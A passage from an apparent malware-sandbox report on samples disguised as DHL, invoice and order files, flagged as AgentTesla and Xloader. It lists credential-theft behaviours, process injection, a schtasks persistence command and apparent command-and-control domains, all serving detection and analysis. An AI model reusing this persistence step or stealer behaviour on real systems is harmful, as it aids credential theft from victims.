SHA512 0348b60095cd48d275a5234fe34c1fd7a7c9921e1d92dafea0379d607f898eb1c2e089dafa1db608fad65497fc8f90fa699109b06a5f2c12c0bc8c9192ff9924

memory/3864-15-0x0000000005CA0000-0x0000000006244000-memory.dmp

memory/3864-16-0x0000000074660000-0x0000000074E10000-memory.dmp

memory/3864-17-0x0000000005940000-0x0000000005958000-memory.dmp

memory/3864-18-0x0000000006500000-0x0000000006566000-memory.dmp

memory/3864-19-0x0000000074660000-0x0000000074E10000-memory.dmp

memory/3864-20-0x0000000074660000-0x0000000074E10000-memory.dmp

memory/3864-21-0x0000000006C00000-0x0000000006C50000-memory.dmp

memory/3864-22-0x0000000006BE0000-0x0000000006BEA000-memory.dmp

memory/3864-23-0x0000000074660000-0x0000000074E10000-memory.dmp

memory/3864-24-0x0000000074660000-0x0000000074E10000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20241010-en

Max time kernel

139s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2600 set thread context of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"

C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"

Network

N/A

Files

memory/2600-0-0x00000000749FE000-0x00000000749FF000-memory.dmp

memory/2600-1-0x0000000000070000-0x000000000015E000-memory.dmp

memory/2600-2-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2600-3-0x0000000000350000-0x0000000000360000-memory.dmp

memory/2600-4-0x00000000749FE000-0x00000000749FF000-memory.dmp

memory/2600-5-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2600-6-0x0000000006050000-0x000000000611C000-memory.dmp

memory/2600-7-0x0000000000840000-0x000000000088E000-memory.dmp

memory/2716-9-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2716-17-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2716-15-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2716-13-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2716-12-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2716-11-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2716-20-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2716-10-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2716-19-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2600-21-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2716-22-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2716-23-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2716-24-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2716-25-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2716-26-0x00000000749F0000-0x00000000750DE000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

149s

Max time network

123s

Command Line

C:\Windows\Explorer.EXE

Signatures

Xloader

loader xloader

Xloader family

xloader

Xloader payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NAPSTAT.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\NAPSTAT.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1292 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 1292 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 1292 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 1292 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1200 wrote to memory of 2656 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
PID 1200 wrote to memory of 2656 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
PID 1200 wrote to memory of 2656 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
PID 1200 wrote to memory of 2656 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NAPSTAT.EXE

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe

"C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IlSblFRyVadI" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFD33.tmp"

C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe

"{path}"

C:\Windows\SysWOW64\NAPSTAT.EXE

"C:\Windows\SysWOW64\NAPSTAT.EXE"

Network

N/A

Files

memory/1292-3-0x00000000005B0000-0x00000000005BA000-memory.dmp

memory/1292-2-0x0000000074C40000-0x000000007532E000-memory.dmp

memory/1292-1-0x0000000000160000-0x0000000000202000-memory.dmp

memory/1292-0-0x0000000074C4E000-0x0000000074C4F000-memory.dmp

memory/1292-4-0x0000000074C4E000-0x0000000074C4F000-memory.dmp

memory/1292-5-0x0000000074C40000-0x000000007532E000-memory.dmp

memory/1292-6-0x00000000055E0000-0x0000000005664000-memory.dmp

memory/1292-7-0x0000000004160000-0x0000000004190000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpFD33.tmp

MD5 235df9cb13f0e61134099fa3131b4200
SHA1 03a5ee592b869bfebd8c9c586c0510d53e6b96a3
SHA256 279cb4ce033c1a0d71e0bae2156173a2d648c6c278f5b47bc64e332a702efa6a
SHA512 36b67e96bbab613f98f27d105607a58e82ea4048d536e8238b3119c3ae200ffaede642ac865918ef30027af51b86c037e57e3f3b3ee9be574993f72f577e1aaf

memory/3008-11-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3008-13-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3008-15-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/3008-18-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3008-20-0x0000000000800000-0x0000000000B03000-memory.dmp

memory/1292-19-0x0000000074C40000-0x000000007532E000-memory.dmp

memory/3008-23-0x0000000000650000-0x0000000000661000-memory.dmp

memory/3008-22-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1200-24-0x0000000006680000-0x0000000006752000-memory.dmp

memory/3008-27-0x0000000000B30000-0x0000000000B41000-memory.dmp

memory/1200-28-0x0000000006760000-0x000000000688C000-memory.dmp

memory/3008-26-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1200-29-0x0000000006680000-0x0000000006752000-memory.dmp

memory/2656-31-0x0000000000DB0000-0x0000000000DF6000-memory.dmp

memory/2656-30-0x0000000000DB0000-0x0000000000DF6000-memory.dmp

memory/2656-32-0x0000000000080000-0x00000000000A9000-memory.dmp

memory/1200-33-0x0000000006760000-0x000000000688C000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

C:\Windows\Explorer.EXE

Signatures

Xloader

loader xloader

Xloader family

xloader

Xloader payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4988 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 4988 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 4988 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 4988 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 4988 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 4988 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 4988 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 4988 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 4988 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 3508 wrote to memory of 756 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 3508 wrote to memory of 756 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 3508 wrote to memory of 756 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe

"C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IlSblFRyVadI" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1FB8.tmp"

C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe

"{path}"

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\SysWOW64\explorer.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 219.194.19.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 107.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 www.knowunknow.com udp
US 104.18.217.221:80 www.knowunknow.com tcp
US 8.8.8.8:53 221.217.18.104.in-addr.arpa udp
US 8.8.8.8:53 www.sarrosh.com udp
US 8.8.8.8:53 www.apollorealtors.com udp
NL 212.32.237.92:80 www.apollorealtors.com tcp
US 8.8.8.8:53 92.237.32.212.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 www.suddennnnnnnnnnnn02.xyz udp
US 8.8.8.8:53 www.webdesigncharlestonsc.com udp
US 162.244.253.20:80 www.webdesigncharlestonsc.com tcp
US 8.8.8.8:53 20.253.244.162.in-addr.arpa udp
US 8.8.8.8:53 www.cacaolixir.com udp
US 3.33.130.190:80 www.cacaolixir.com tcp
US 8.8.8.8:53 190.130.33.3.in-addr.arpa udp
US 8.8.8.8:53 www.avaxbridgeapes.com udp
FR 13.32.145.56:80 www.avaxbridgeapes.com tcp
US 8.8.8.8:53 56.145.32.13.in-addr.arpa udp
US 8.8.8.8:53 www.palmsugar.biz udp
US 8.8.8.8:53 www.zvedaventeco.quest udp
US 8.8.8.8:53 www.724ototamir.com udp
US 8.8.8.8:53 www.tenlog001.xyz udp
US 8.8.8.8:53 www.dazalogistics.com udp
US 76.223.105.230:80 www.dazalogistics.com tcp
US 8.8.8.8:53 230.105.223.76.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/4988-0-0x0000000074D5E000-0x0000000074D5F000-memory.dmp

memory/4988-1-0x0000000000740000-0x00000000007E2000-memory.dmp

memory/4988-2-0x00000000056D0000-0x0000000005C74000-memory.dmp

memory/4988-3-0x00000000051C0000-0x0000000005252000-memory.dmp

memory/4988-4-0x0000000005260000-0x00000000052FC000-memory.dmp

memory/4988-5-0x0000000074D50000-0x0000000075500000-memory.dmp

memory/4988-6-0x0000000005190000-0x000000000519A000-memory.dmp

memory/4988-7-0x00000000055B0000-0x00000000055BA000-memory.dmp

memory/4988-8-0x0000000074D5E000-0x0000000074D5F000-memory.dmp

memory/4988-9-0x0000000074D50000-0x0000000075500000-memory.dmp

memory/4988-10-0x00000000081B0000-0x0000000008234000-memory.dmp

memory/4988-11-0x0000000006F10000-0x0000000006F40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp1FB8.tmp

MD5 9c5f354653322ec06ab4ebb449e2437b
SHA1 375d5329debbebcf8688639c7ef7981aa77f5534
SHA256 8c6ac426262941b59edd01a7e5999cc822f25e8ef4cd9bf5d40e63f00d32faf2
SHA512 a97317b55c144fdc08a91c69fef2d40098991ab13a45ceecbd75eabba357ec9f41612b5b1bcc7b4c8e27875b74a6e0ca7019ca8a610eaae2e9de7eb5223f6175

memory/4072-15-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4988-17-0x0000000074D50000-0x0000000075500000-memory.dmp

memory/4072-18-0x0000000001710000-0x0000000001A5A000-memory.dmp

memory/4072-20-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4072-21-0x0000000001690000-0x00000000016A1000-memory.dmp

memory/3508-22-0x0000000003D40000-0x0000000003DEF000-memory.dmp

memory/4072-25-0x0000000003410000-0x0000000003421000-memory.dmp

memory/3508-26-0x0000000007A00000-0x0000000007B10000-memory.dmp

memory/4072-24-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3508-27-0x0000000003D40000-0x0000000003DEF000-memory.dmp

memory/756-28-0x0000000000B10000-0x0000000000F43000-memory.dmp

memory/756-30-0x0000000000B10000-0x0000000000F43000-memory.dmp

memory/756-31-0x0000000001250000-0x0000000001279000-memory.dmp

memory/3508-32-0x0000000007A00000-0x0000000007B10000-memory.dmp

memory/3508-36-0x0000000007ED0000-0x0000000008042000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

118s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
